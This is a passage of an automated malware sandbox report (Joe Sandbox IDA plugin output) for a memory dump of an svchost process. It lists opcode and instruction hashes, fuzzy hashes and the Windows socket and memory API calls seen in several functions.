                                                                                    • Opcode ID: fff0fd9b7cb120672a85e668f6dfb7ca7cb067461fc3982cddec7bfdaaa9d028
                                                                                    • Instruction ID: a9ecf8890fe5c984853723e9a7e6ba062aaddf1a15226c5f3315e0cabc93ecf7
                                                                                    • Opcode Fuzzy Hash: fff0fd9b7cb120672a85e668f6dfb7ca7cb067461fc3982cddec7bfdaaa9d028
                                                                                    • Instruction Fuzzy Hash: 95319F75A10609AFCF24DF98C888AEEBBBAFF48314F244499E401D7211D374F995CBA0
                                                                                    APIs
                                                                                    • WSARecv.WS2_32(?,?,00000001,00000000,?,00000000,00000000), ref: 05B6B732
                                                                                    • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000000), ref: 05B6B7E3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastRecv
                                                                                    • String ID: E'
                                                                                    • API String ID: 904507345-3751625834
                                                                                    • Opcode ID: e85513ec176c27134cd37bebb4bc93c8f6a36919a65c79554143ae3e7499115d
                                                                                    • Instruction ID: 143e6c3541cf44e5d8810eb13d65d3758867c4b70825c0ab84466aec057b656c
                                                                                    • Opcode Fuzzy Hash: e85513ec176c27134cd37bebb4bc93c8f6a36919a65c79554143ae3e7499115d
                                                                                    • Instruction Fuzzy Hash: 3881C271504708AFDB348F14C884EBAB7B9FF04364F0046AEE996C6591E739FA468B91
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: strlen$callocfree
                                                                                    • String ID:
                                                                                    • API String ID: 3898528724-0
                                                                                    • Opcode ID: 5e134de63ce87143c0ce6f08789dcaef4f21aa39f9064c10556045220749b912
                                                                                    • Instruction ID: 0230cfa745999911ea9fe7aeeb024fefa56a17e190bad95293d39c56630bea20
                                                                                    • Opcode Fuzzy Hash: 5e134de63ce87143c0ce6f08789dcaef4f21aa39f9064c10556045220749b912
                                                                                    • Instruction Fuzzy Hash: D60140716087019FEB209F79AC85B77779FFF44255F0048AAF61AC2145DB35B500C662